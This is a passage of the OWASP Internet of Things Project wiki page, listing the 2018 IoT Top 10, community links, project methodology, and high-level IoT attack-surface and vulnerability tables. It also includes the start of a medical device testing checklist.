== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Quick Download ==<br />
* Coming Soon<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= Community =<br />
<br />
[https://www.iamthecavalry.org/ I Am The Cavalry] <br />
<br />
A global grassroots organization that is focused on issues where computer security intersects public safety and human life.<br />
<br />
Their areas of focus include:<br />
* Medical devices<br />
* Automobiles<br />
* Home Electronics<br />
* Public Infrastructure<br />
<br />
[https://otalliance.org Online Trust Alliance]<br />
<br />
Formed as an informal industry working group in 2005, today OTA is an Internal Revenue Service (IRS) approved 501c3 charitable organization with the mission to enhance online trust and empower users, while promoting innovation and the vitality of the internet. OTA is global organization supported by over 100 organizations headquartered in Bellevue, Washington with offices in Washington DC.<br />
<br />
Addressing the mounting concerns, in January 2015 the Online Trust Alliance, established the [https://otalliance.org/initiatives/internet-things IoT Trustworthy Working Group (ITWG)], a multi-stakeholder initiative. The group recognizes “security and privacy by design” must be a priority from the onset of product development and be addressed holistically. The framework focuses on privacy, security sustainability. The sustainability pillar is critical as it looks at the life-cycle issues related to long- term supportability and transfers of ownership of devices and the data collected.<br />
<br />
[https://allseenalliance.org/framework AllSeen Alliance]<br />
<br />
The AllSeen Alliance is a Linux Foundation collaborative project. They're a cross-industry consortium dedicated to enabling the interoperability of billions of devices, services and apps that comprise the Internet of Things. The Alliance supports the AllJoyn Framework, an open source software framework that makes it easy for devices and apps to discover and communicate with each other. Developers can write applications for interoperability regardless of transport layer, manufacturer, and without the need for Internet access. The software has been and will continue to be openly available for developers to download, and runs on popular platforms such as Linux and Linux-based Android, iOS, and Windows, including many other lightweight real-time operating systems.<br />
<br />
[http://www.iiconsortium.org/ The Industrial Internet Consortium (IIC)]<br />
<br />
The Industrial Internet Consortium is the open membership, international not-for-profit consortium that is setting the architectural framework and direction for the Industrial Internet. Founded by AT&T, Cisco, GE, IBM and Intel in March 2014, the consortium’s mission is to coordinate vast ecosystem initiatives to connect and integrate objects with people, processes and data using common architectures, interoperability and open standards.<br />
<br />
[http://securingsmartcities.org/ Securing Smart Cities]<br />
<br />
Securing Smart Cities is a not-for-profit global initiative that aims to solve the existing and future cybersecurity problems of smart cities through collaboration between companies, governments, media outlets, other not-for-profit initiatives and individuals across the world.<br />
<br />
===Talks===<br />
<br />
RSA Conference San Francisco <br> <br />
[https://www.owasp.org/images/5/51/RSAC2015-OWASP-IoT-Miessler.pdf Securing the Internet of Things: Mapping IoT Attack Surface Areas with the OWASP IoT Top 10 Project] <br><br />
Daniel Miessler, Practice Principal <br><br />
April 21, 2015 <br><br />
--- <br><br />
Defcon 23 <br><br />
[https://www.owasp.org/images/3/36/IoTTestingMethodology.pdf IoT Attack Surface Mapping] <br><br />
Daniel Miessler <br><br />
August 6-9, 2015<br />
<br />
===Podcasts===<br />
<br />
* [http://iotpodcast.com/ The Internet of Things Podcast]<br />
* [http://www.iot-inc.com/ IoT Inc]<br />
* [https://craigsmith.net/iot-this-week/ IoT This Week]<br />
* [http://farstuff.com/ Farstuff: The Internet of Things Podcast]<br />
<br />
===IoT Conferences===<br />
<br />
* [http://www.iotevents.org Internet of Things Events]<br />
<br />
Conference Call for Papers<br />
* [http://www.wikicfp.com/cfp/servlet/tool.search?q=internet+of+things&year=t WikiCFP - Internet of Things]<br />
* [http://www.wikicfp.com/cfp/servlet/tool.search?q=iot&year=t WikiCFP - IoT]<br />
<br />
<br />
<br />
=Project About=<br />
<br />
{{Template:Project About<br />
| project_name =OWASP Internet of Things Project<br />
| project_description = <br />
| project_license =CC-BY 3.0 for documentation and GPLv3 for code. <br />
| leader_name1 = Daniel Miessler<br />
| leader_email1 = <br />
| leader_username1 = <br />
| leader_name2 =Craig Smith<br />
| leader_email2 = <br />
| leader_username2 = <br />
| contributor_name1 = Justin Klein Keane]<br />
| contributor_email1 = <br />
| contributor_username1 = Justin_C._Klein_Keane<br />
| contributor_name2 = Yunsoul<br />
| contributor_email2 = <br />
| contributor_username2 = Yunsoul<br />
| mailing_list_name = <br />
| links_url1 = <br />
| links_name1 =<br />
}} <br />
<br />
<br />
<br />
__NOTOC__ <headertabs></headertabs><br />
<br />
[[Category:OWASP_Project]] <br />
[[Category:OWASP_Document]] <br />
[[Category:OWASP_Download]] <br />
[[Category:OWASP_Release_Quality_Document]]</div>Aaron.guzmanhttps://wiki.owasp.org/index.php?title=OWASP_Internet_of_Things_Project&diff=246191OWASP Internet of Things Project2018-12-20T00:05:19Z<p>Aaron.guzman: /* Updated! */</p>
<hr />
<div>= Main =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
== OWASP Internet of Things (IoT) Project ==<br />
Oxford defines the Internet of Things as: “A proposed development of the Internet in which everyday objects have network connectivity, allowing them to send and receive data.”<br />
<br />
''The OWASP Internet of Things Project is designed to help manufacturers, developers, and consumers better understand the security issues associated with the Internet of Things, and to enable users in any context to make better security decisions when building, deploying, or assessing IoT technologies''. <br />
<br />
The project looks to define a structure for various IoT sub-projects such as Attack Surface Areas, Testing Guides and Top Vulnerabilities.<br />
<br />
==Updated!==<br />
<br />
The OWASP IoT Project for 2018 has just been released!<br />
<br />
[[File:2018 IoT Top10.png|center|thumb|1290x1290px]]<br />
<br />
== Philosophy ==<br />
The OWASP Internet of Things Project was started in 2014 as a way help Developers, Manufacturers, Enterprises, and Consumers to make better decisions regarding the creation and use of IoT systems.<br />
<br />
This continues today with the 2018 release of the OWASP IoT Top 10, which represents the top ten things to avoid when building, deploying, or managing IoT systems. The primary theme for the 2018 OWASP Internet of Things Top 10 is simplicity. Rather than having separate lists for risks vs. threats vs. vulnerabilities—or for developers vs. enterprises vs. consumers—the project team elected to have a single, unified list that captures the top things to avoid when dealing with IoT Security.<br />
<br />
The team recognized that there are now dozens of organizations releasing elaborate guidance on IoT Security—all of which are designed for slightly different audiences and industry verticals. We thought the most useful resource we could create is a single list that addresses the highest priority issues for manufacturers, enterprises, and consumers at the same time.<br />
<br />
The result is the [https://www.owasp.org/images/1/1c/OWASP-IoT-Top-10-2018-final.pdf 2018 OWASP IoT Top 10].<br />
<br />
== Methodology ==<br />
The project team is a collection of volunteer professionals from within the security industry, with experience spanning multiple areas of expertise, including: manufacturers, consulting, security testers, developers, and many more.<br />
<br />
The project was conducted in the following phases:<br />
# '''Team Formation''': finding people who would be willing to contribute to the 2018 update, both as SMEs and as project leaders to perform various tasks within the duration of the project.<br />
# '''Project Review:''' analysis of the 2014 project to determine what’s changed in the industry since that release, and how the list should be updated given those changes.<br />
# '''Data Collection''': collection and review of multiple vulnerability sources (both public and private), with special emphasis on which issues caused the most actual impact and damage.<br />
# '''Sister Project Review''': a review of dozens of other IoT Security projects to ensure that we’d not missed something major and that we were comfortable with both the content and prioritization of our release. Examples included: [https://cloudsecurityalliance.org/artifacts/csa-iot-controls-matrix/ CSA IoT Controls Matrix], [https://api.ctia.org/wp-content/uploads/2018/08/CTIA-IoT-Cybersecurity-Certification-Test-Plan-V1_0.pdf CTIA], [http://iot.stanford.edu/ Stanford’s Secure Internet of Things Project], [https://nvlpubs.nist.gov/nistpubs/ir/2018/NIST.IR.8200.pdf NISTIR 8200], [https://www.enisa.europa.eu/publications/baseline-security-recommendations-for-iot/at_download/fullReport ENISA IoT Baseline Report], [https://assets.publishing.service.gov.uk/government/uploads/system/uploads/attachment_data/file/747413/Code_of_Practice_for_Consumer_IoT_Security_October_2018.pdf Code of Practice for Consumer IoT Security,] and others.<br />
# '''Community Draft Feedback''': release of the draft to the community for review, including multiple Twitter calls for comments, the use of a public feedback form, and a number of public talks where feedback was gathered. The feedback was then reviewed by the team along with initial Data Collection, as well as Sister Project Review, to create the list contents and prioritization.<br />
# '''Release:''' release of the project to the public in December 2018.<br />
<br />
== The Future of the OWASP IoT Top 10 ==<br />
The team has a number of activities planned to continue improving on the project going forward.<br />
<br />
Some of the items being discussed include:<br />
* Continuing to improve the list on a two-year cadence, incorporating feedback from the community and from additional project contributors to ensure we are staying current with issues facing the industry.<br />
* Mapping the list items to other OWASP projects, such as the ASVS, and perhaps to other projects outside OWASP as well.<br />
* Expanding the project into other aspects of IoT—including embedded security, ICS/ SCADA,etc.<br />
* Adding use and abuse cases, with multiple examples, to solidify each concept discussed.<br />
* Considering the addition of reference architectures, so we can not only tell people what to avoid, but how to do what they need to do securely.<br />
<br />
Participation in the OWASP IoT Project is open to the community. We take input from all participants — whether you’re a developer, a manufacturer, a penetration tester, or someone just trying to implement IoT securely. You can find the team meeting every other Friday in the the #iot-security room of the OWASP Slack Channel.<br />
<br />
'''''The OWASP IoT Security Team, 2018'''''<br />
<br />
==Licensing==<br />
The OWASP Internet of Things Project is free to use. It is licensed under the http://creativecommons.org/licenses/by-sa/3.0/ Creative Commons Attribution-ShareAlike 3.0 license], so you can copy, distribute and transmit the work, and you can adapt it, and use it commercially, but all provided that you attribute the work and if you alter, transform, or build upon this work, you may distribute the resulting work only under the same or similar license to this one.<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:200px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the OWASP Internet of Things Project? ==<br />
<br />
The OWASP Internet of Things Project provides information on:<br />
<br />
* [https://www.owasp.org/index.php/IoT_Attack_Surface_Areas IoT Attack Surface Areas]<br />
* IoT Vulnerabilities<br />
* Firmware Analysis<br />
* ICS/SCADA Software Weaknesses<br />
* Community Information<br />
* [https://www.owasp.org/index.php/IoT_Testing_Guides IoT Testing Guides]<br />
* [https://www.owasp.org/index.php/IoT_Security_Guidance IoT Security Guidance]<br />
* [https://www.owasp.org/index.php/Principles_of_IoT_Security Principles of IoT Security]<br />
* [https://www.owasp.org/index.php/IoT_Framework_Assessment IoT Framework Assessment]<br />
* Developer, Consumer and Manufacturer Guidance<br />
* Design Principles<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
* Craig Smith<br />
* Vishruta Rudresh<br />
* Aaron Guzman<br />
<br />
== Contributors ==<br />
* [https://www.owasp.org/index.php/User:Justin_C._Klein_Keane Justin Klein Keane]<br />
* Saša Zdjelar<br />
<br />
== IoT Top 2018 Contributors ==<br />
* Vijayamurugan Pushpanathan <br />
* Alexander Lafrenz <br />
* Masahiro Murashima <br />
* Charlie Worrell <br />
* José A. Rivas (jarv) <br />
* Pablo Endres <br />
* Ade Yoseman <br />
* Cédric Levy-Bencheotn<br />
* Jason Andress<br />
* Amélie Didion - Designer<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Project|OWASP Project Repository]]<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
* [https://www.owasp.org/index.php/OWASP_Embedded_Application_Security OWASP Embedded Application Security]<br />
* [https://www.owasp.org/index.php/C-Based_Toolchain_Hardening OWASP C-based Toolchain Hardening]<br />
<br />
| style="padding-left:25px;width:200px;" valign="top" |<br />
<br />
== Collaboration ==<br />
[https://owasp.slack.com The OWASP Slack Channel]<br />
<br />
Hint: If you're new to Slack, [https://lists.owasp.org/pipermail/owasp-community/2015-July/000703.html join OWASP's slack channel first], then join #iot-security within OWASP's channel.<br />
<br />
== Quick Download ==<br />
[https://www.owasp.org/images/1/1c/OWASP-IoT-Top-10-2018-final.pdf OWASP IoT Top Ten 2018]<br />
<br />
[https://1drv.ms/v/s!AucQMYXJNefdwAwa5IPz2cg3cvWe OWASP IoT 2018 Planning Session]<br />
<br />
[https://www.owasp.org/images/7/7b/IoT_Preso_v1.pptx Quick discussion on IoT]<br />
<br />
[https://www.owasp.org/images/3/36/IoTTestingMethodology.pdf IoT Attack Surface Mapping DEFCON 23]<br />
<br />
[https://www.owasp.org/images/2/2d/Iot_testing_methodology.JPG IoT Testing Guidance Handout]<br />
<br />
[https://www.owasp.org/images/7/71/Internet_of_Things_Top_Ten_2014-OWASP.pdf OWASP IoT Top Ten PDF]<br />
<br />
[https://www.owasp.org/images/8/8e/Infographic-v1.jpg OWASP IoT Top Ten Infographic]<br />
<br />
[https://www.owasp.org/images/0/01/Internet_of_Things_Top_Ten_2014-OWASP-ppt.pptx OWASP IoT Top Ten PPT]<br />
<br />
[https://www.owasp.org/images/5/51/RSAC2015-OWASP-IoT-Miessler.pdf OWASP IoT Top Ten-RSA 2015]<br />
<br />
[https://www.owasp.org/images/b/bd/OWASP-IoT.pptx OWASP IoT Project Overview]<br />
<br />
== News and Events ==<br />
* [https://1drv.ms/v/s!AucQMYXJNefdwAwa5IPz2cg3cvWe OWASP IoT 2018 Planning Session]<br />
* Added a [https://owasp-iot-security.slack.com/ Slack channel]<br />
* Added a sub-project; [https://www.owasp.org/index.php/OWASP_Internet_of_Things_Project#tab=IoT_Security_Policy_Project IoT Security Policy Project]<br />
* Daniel Miessler gave his [https://www.youtube.com/watch?v=RhxHHD790nw IoT talk at DEFCON 23]<br />
* Migrating the IoT Top Ten to be under the IoT Project<br />
* HP Study Reveals 70 Percent of Internet of Things Devices Vulnerable to Attack<br />
<br />
==Classifications==<br />
<br />
{| width="200" cellpadding="2"<br />
|-<br />
| rowspan="2" width="50%" valign="top" align="center" | [[File:Owasp-incubator-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]<br />
| width="50%" valign="top" align="center" | [[File:Owasp-builders-small.png|link=]] <br />
|-<br />
| width="50%" valign="top" align="center" | [[File:Owasp-defenders-small.png|link=]]<br />
|-<br />
| colspan="2" align="center" | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]]<br />
|-<br />
| colspan="2" align="center" | [[File:Project_Type_Files_DOC.jpg|link=]]<br />
|}<br />
<br />
|}<br />
<br />
= IoT Top 10 =<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
== Internet of Things (IoT) Top 10 2018 ==<br />
The [https://www.owasp.org/images/1/1c/OWASP-IoT-Top-10-2018-final.pdf OWASP IoT Top 10 - 2018] is now available.<br />
* I1 Weak Guessable, or Hardcoded Passwords<br />
<br />
* I2 Insecure Network Services<br />
<br />
* I3 Insecure Ecosystem Interfaces<br />
<br />
* I4 Lack of Secure Update Mechanism<br />
<br />
* I5 Use of Insecure or Outdated Components<br />
<br />
* I6 Insufficient Privacy Protection<br />
<br />
* I7 Insecure Data Transfer and Storage<br />
<br />
* I8 Lack of Device Management<br />
<br />
* I9 Insecure Default Settings<br />
<br />
* I10 Lack of Physical Hardening<br />
== Internet of Things (IoT) Top 10 2014 ==<br />
* [[Top 10 2014-I1 Insecure Web Interface|I1 Insecure Web Interface]]<br />
* [[Top 10 2014-I2 Insufficient Authentication/Authorization|I2 Insufficient Authentication/Authorization]]<br />
* [[Top 10 2014-I3 Insecure Network Services|I3 Insecure Network Services]]<br />
* [[Top 10 2014-I4 Lack of Transport Encryption|I4 Lack of Transport Encryption]]<br />
* [[Top 10 2014-I5 Privacy Concerns|I5 Privacy Concerns]]<br />
* [[Top 10 2014-I6 Insecure Cloud Interface|I6 Insecure Cloud Interface]]<br />
* [[Top 10 2014-I7 Insecure Mobile Interface|I7 Insecure Mobile Interface]]<br />
* [[Top 10 2014-I8 Insufficient Security Configurability|I8 Insufficient Security Configurability]]<br />
* [[Top 10 2014-I9 Insecure Software/Firmware|I9 Insecure Software/Firmware]]<br />
* [[Top 10 2014-I10 Poor Physical Security|I10 Poor Physical Security]]<br />
<br />
= IoT Attack Surface Areas =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Attack Surface Areas Project ==<br />
<br />
The OWASP IoT Attack Surface Areas (DRAFT) are as follows:<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Attack Surface<br />
! Vulnerability<br />
|- <br />
| '''Ecosystem (general)'''<br />
|<br />
* Interoperability standards<br />
* Data governance<br />
* System wide failure<br />
* Individual stakeholder risks<br />
* Implicit trust between components<br />
* Enrollment security<br />
* Decommissioning system<br />
* Lost access procedures<br />
|- <br />
| '''Device Memory'''<br />
|<br />
* Sensitive data<br />
** Cleartext usernames<br />
** Cleartext passwords<br />
** Third-party credentials<br />
** Encryption keys<br />
|- <br />
| '''Device Physical Interfaces'''<br />
|<br />
* Firmware extraction<br />
* User CLI<br />
* Admin CLI<br />
* Privilege escalation<br />
* Reset to insecure state<br />
* Removal of storage media<br />
* Tamper resistance<br />
* Debug port<br />
** UART (Serial)<br />
** JTAG / SWD<br />
* Device ID/Serial number exposure<br />
|-<br />
| '''Device Web Interface'''<br />
|<br />
* Standard set of web application vulnerabilities, see:<br />
** [[:Category:OWASP Top Ten Project|OWASP Web Top 10]]<br />
** [[:Category:OWASP Application Security Verification Standard Project|OWASP ASVS]]<br />
** [[:Category:OWASP Testing Project|OWASP Testing guide]]<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Device Firmware'''<br />
|<br />
* Sensitive data exposure ([[Top 10 2013-A6-Sensitive Data Exposure|See OWASP Top 10 - A6 Sensitive data exposure]]):<br />
** Backdoor accounts<br />
** Hardcoded credentials<br />
** Encryption keys<br />
** Encryption (Symmetric, Asymmetric)<br />
** Sensitive information<br />
** Sensitive URL disclosure<br />
* Firmware version display and/or last update date<br />
* Vulnerable services (web, ssh, tftp, etc.)<br />
** Verify for old sw versions and possible attacks (Heartbleed, Shellshock, old PHP versions etc)<br />
* Security related function API exposure<br />
* Firmware downgrade possibility<br />
|- <br />
| '''Device Network Services'''<br />
|<br />
* Information disclosure<br />
* User CLI<br />
* Administrative CLI<br />
* Injection<br />
* Denial of Service<br />
* Unencrypted Services<br />
* Poorly implemented encryption<br />
* Test/Development Services<br />
* Buffer Overflow<br />
* UPnP<br />
* Vulnerable UDP Services<br />
* DoS<br />
* Device Firmware OTA update block<br />
* Firmware loaded over insecure channel (no TLS)<br />
* Replay attack<br />
* Lack of payload verification<br />
* Lack of message integrity check<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Administrative Interface'''<br />
|<br />
* Standard set of web application vulnerabilities, see:<br />
** [[:Category:OWASP Top Ten Project|OWASP Web Top 10]]<br />
** [[:Category:OWASP Application Security Verification Standard Project|OWASP ASVS]]<br />
** [[:Category:OWASP Testing Project|OWASP Testing guide]]<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Security/encryption options<br />
* Logging options<br />
* Two-factor authentication<br />
* Check for insecure direct object references<br />
* Inability to wipe device<br />
|- <br />
| '''Local Data Storage'''<br />
|<br />
* Unencrypted data<br />
* Data encrypted with discovered keys<br />
* Lack of data integrity checks<br />
* Use of static same enc/dec key<br />
|- <br />
| '''Cloud Web Interface'''<br />
|<br />
<br />
* Standard set of web application vulnerabilities, see:<br />
** [[:Category:OWASP Top Ten Project|OWASP Web Top 10]]<br />
** [[:Category:OWASP Application Security Verification Standard Project|OWASP ASVS]]<br />
** [[:Category:OWASP Testing Project|OWASP Testing guide]]<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Transport encryption<br />
* Two-factor authentication<br />
|- <br />
| '''Third-party Backend APIs'''<br />
|<br />
* Unencrypted PII sent<br />
* Encrypted PII sent<br />
* Device information leaked<br />
* Location leaked<br />
|- <br />
| '''Update Mechanism'''<br />
|<br />
* Update sent without encryption<br />
* Updates not signed<br />
* Update location writable<br />
* Update verification<br />
* Update authentication<br />
* Malicious update<br />
* Missing update mechanism<br />
* No manual update mechanism<br />
|- <br />
| '''Mobile Application'''<br />
|<br />
* Implicitly trusted by device or cloud<br />
* Username enumeration<br />
* Account lockout<br />
* Known default credentials<br />
* Weak passwords<br />
* Insecure data storage<br />
* Transport encryption<br />
* Insecure password recovery mechanism<br />
* Two-factor authentication<br />
|- <br />
| '''Vendor Backend APIs'''<br />
|<br />
* Inherent trust of cloud or mobile application<br />
* Weak authentication<br />
* Weak access controls<br />
* Injection attacks<br />
* Hidden services<br />
|- <br />
| '''Ecosystem Communication'''<br />
|<br />
* Health checks<br />
* Heartbeats<br />
* Ecosystem commands<br />
* Deprovisioning<br />
* Pushing updates<br />
|- <br />
| '''Network Traffic'''<br />
|<br />
* LAN<br />
* LAN to Internet<br />
* Short range<br />
* Non-standard<br />
* Wireless (WiFi, Z-wave, XBee, Zigbee, Bluetooth, LoRA)<br />
* Protocol fuzzing<br />
|- <br />
| '''Authentication/Authorization'''<br />
|<br />
* Authentication/Authorization related values (session key, token, cookie, etc.) disclosure<br />
* Reusing of session key, token, etc.<br />
* Device to device authentication<br />
* Device to mobile Application authentication<br />
* Device to cloud system authentication<br />
* Mobile application to cloud system authentication<br />
* Web application to cloud system authentication<br />
* Lack of dynamic authentication<br />
|-<br />
| '''Privacy'''<br />
|<br />
* User data disclosure<br />
* User/device location disclosure<br />
* Differential privacy<br />
|-<br />
| '''Hardware (Sensors)'''<br />
|<br />
* Sensing Environment Manipulation<br />
* Tampering (Physically)<br />
* Damage (Physicall)<br />
<br />
|-<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the IoT Attack Surface Areas Project? ==<br />
<br />
The IoT Attack Surface Areas Project provides a list of attack surfaces that should be understood by manufacturers, developers, security researchers, and those looking to deploy or implement IoT technologies within their organizations.<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
* Craig Smith<br />
<br />
== Related Projects ==<br />
<br />
* [https://www.owasp.org/index.php/OWASP_Mobile_Security_Project The OWASP Mobile Top 10 Project]<br />
* [https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project The OWASP Web Top 10 Project]<br />
<br />
== Collaboration ==<br />
[https://owasp.slack.com The Slack Channel]<br />
<br />
== Quick Download ==<br />
* Coming Soon<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= IoT Vulnerabilities =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Vulnerabilities Project ==<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Vulnerability<br />
! Attack Surface<br />
! Summary<br />
|-<br />
| '''Username Enumeration'''<br />
|<br />
* Administrative Interface<br />
* Device Web Interface<br />
* Cloud Interface<br />
* Mobile Application<br />
|<br />
* Ability to collect a set of valid usernames by interacting with the authentication mechanism<br />
|-<br />
| '''Weak Passwords'''<br />
|<br />
* Administrative Interface<br />
* Device Web Interface<br />
* Cloud Interface<br />
* Mobile Application<br />
|<br />
* Ability to set account passwords to '1234' or '123456' for example.<br />
* Usage of pre-programmed default passwords<br />
|-<br />
| '''Account Lockout'''<br />
|<br />
* Administrative Interface<br />
* Device Web Interface<br />
* Cloud Interface<br />
* Mobile Application<br />
|<br />
* Ability to continue sending authentication attempts after 3 - 5 failed login attempts<br />
|-<br />
| '''Unencrypted Services'''<br />
|<br />
* Device Network Services<br />
|<br />
* Network services are not properly encrypted to prevent eavesdropping or tampering by attackers<br />
|-<br />
| '''Two-factor Authentication'''<br />
|<br />
* Administrative Interface<br />
* Cloud Web Interface<br />
* Mobile Application<br />
|<br />
* Lack of two-factor authentication mechanisms such as a security token or fingerprint scanner<br />
|-<br />
| '''Poorly Implemented Encryption'''<br />
|<br />
* Device Network Services<br />
|<br />
* Encryption is implemented however it is improperly configured or is not being properly updated, e.g. using SSL v2 <br />
|-<br />
| '''Update Sent Without Encryption'''<br />
|<br />
* Update Mechanism<br />
|<br />
* Updates are transmitted over the network without using TLS or encrypting the update file itself<br />
|-<br />
| '''Update Location Writable'''<br />
|<br />
* Update Mechanism<br />
|<br />
* Storage location for update files is world writable potentially allowing firmware to be modified and distributed to all users<br />
|-<br />
| '''Denial of Service'''<br />
|<br />
* Device Network Services<br />
|<br />
* Service can be attacked in a way that denies service to that service or the entire device<br />
|-<br />
| '''Removal of Storage Media'''<br />
|<br />
* Device Physical Interfaces<br />
|<br />
* Ability to physically remove the storage media from the device<br />
|-<br />
| '''No Manual Update Mechanism'''<br />
|<br />
* Update Mechanism<br />
|<br />
* No ability to manually force an update check for the device<br />
|-<br />
| '''Missing Update Mechanism'''<br />
|<br />
* Update Mechanism<br />
|<br />
* No ability to update device<br />
|-<br />
| '''Firmware Version Display and/or Last Update Date'''<br />
|<br />
* Device Firmware<br />
|<br />
* Current firmware version is not displayed and/or the last update date is not displayed<br />
|-<br />
| '''Firmware and storage extraction'''<br />
|<br />
* JTAG / SWD interface<br />
* [https://www.flashrom.org/Flashrom In-Situ dumping]<br />
* Intercepting a OTA update<br />
* Downloading from the manufacturers web page<br />
* [https://www.exploitee.rs/index.php/Exploitee.rs_Low_Voltage_e-MMC_Adapter eMMC tapping]<br />
* Unsoldering the SPI Flash / eMMC chip and reading it in a adapter<br />
|<br />
* Firmware contains a lot of useful information, like source code and binaries of running services, pre-set passwords, ssh keys etc. <br />
|-<br />
| '''Manipulating the code execution flow of the device'''<br />
|<br />
* JTAG / SWD interface<br />
* [https://wiki.newae.com/Main_Page Side channel attacks like glitching]<br />
|<br />
* With the help of a JTAG adapter and gdb we can modify the execution of firmware in the device and bypass almost all software based security controls.<br />
* Side channel attacks can also modify the execution flow or can be used to leak interesting information from the device<br />
|-<br />
| '''Obtaining console access'''<br />
|<br />
* Serial interfaces (SPI / UART)<br />
|<br />
* By connecting to a serial interface, we will obtain full console access to a device<br />
* Usually security measures include custom bootloaders that prevent the attacker from entering single user mode, but that can also be bypassed.<br />
|-<br />
| '''Insecure 3rd party components'''<br />
|<br />
* Software<br />
|<br />
* Out of date versions of busybox, openssl, ssh, web servers, etc.<br />
|-<br />
<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the IoT Vulnerabilities Project? ==<br />
<br />
The IoT Vulnerabilities Project provides:<br />
<br />
* Information on the top IoT vulnerabilities<br />
* The attack surface associated with the vulnerability<br />
* A summary of the vulnerability<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
* Craig Smith<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Resources ==<br />
* [https://www.owasp.org/index.php/Top_IoT_Vulnerabilities Top 10 IoT Vulnerabilities from 2014]<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= Medical Devices =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== Medical Device Testing ==<br />
<br />
The Medical Device Testing project is intended to provide some basic attack surface considerations that should be evaluated before shipping Medical Device equipment.<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Attack Surface<br />
! Vulnerability<br />
|- <br />
| '''Ecosystem (general)'''<br />
|<br />
* Interoperability standards<br />
* Data governance<br />
* System wide failure<br />
* Individual stakeholder risks<br />
* Implicit trust between components<br />
* Enrollment security<br />
* Decommissioning system<br />
* Lost access procedures<br />
|- <br />
| '''HL7'''<br />
|<br />
* XML Parsing<br />
** XSS<br />
* Information Disclosure<br />
|- <br />
| '''Device Memory'''<br />
|<br />
* Sensitive data<br />
** Cleartext usernames<br />
** Cleartext passwords<br />
** Third-party credentials<br />
** Encryption keys<br />
|- <br />
| '''Device Physical Interfaces'''<br />
|<br />
* Firmware extraction<br />
* User CLI<br />
* Admin CLI<br />
* Privilege escalation<br />
* Reset to insecure state<br />
* Removal of storage media<br />
* Tamper resistance<br />
* Debug port<br />
* Device ID/Serial number exposure<br />
|-<br />
| '''Device Web Interface'''<br />
|<br />
* Standard set of web vulnerabilities:<br />
** SQL injection<br />
** Cross-site scripting<br />
** Cross-site Request Forgery<br />
** Username enumeration<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Device Firmware'''<br />
|<br />
* Sensitive data exposure:<br />
** Backdoor accounts<br />
** Hardcoded credentials<br />
** Encryption keys<br />
** Encryption (Symmetric, Asymmetric)<br />
** Sensitive information<br />
** Sensitive URL disclosure<br />
* Firmware version display and/or last update date<br />
* Vulnerable services (web, ssh, tftp, etc.)<br />
* Security related function API exposure<br />
* Firmware downgrade<br />
|- <br />
| '''Device Network Services'''<br />
|<br />
